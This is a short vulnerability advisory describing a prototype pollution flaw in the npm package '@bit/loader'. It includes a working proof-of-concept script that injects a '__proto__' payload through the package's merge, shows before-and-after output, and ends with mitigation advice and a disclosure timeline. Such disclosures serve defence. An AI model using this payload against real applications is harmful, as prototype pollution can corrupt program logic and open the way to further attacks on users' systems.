Affected versions of this package are vulnerable to Prototype Pollution where the merge is invoked in M function unsafely Since the infected e argument with proto object missing check if it resolves to the object prototype, the malicious property are then copied on the Object prototype by the merge operation to the empty object and recursively affected all the objects in the program.
(async () => {
const lib = await import('@bit/loader');
var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
lib.default (BAD_JSON)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();
Output:
Before Attack: {}
After Attack: {"polluted":true}
Output of a successful fix:
Before Attack: {}
After Attack: {}
This package has no security updates on the mentioned vulnereability, therefore, users should ensure proper santization and validation over user's supplied inputs. Blocking inputs containing __proto__
, contructor.prototype
Update: Disclosed publicly following four months of no response from the maintainer.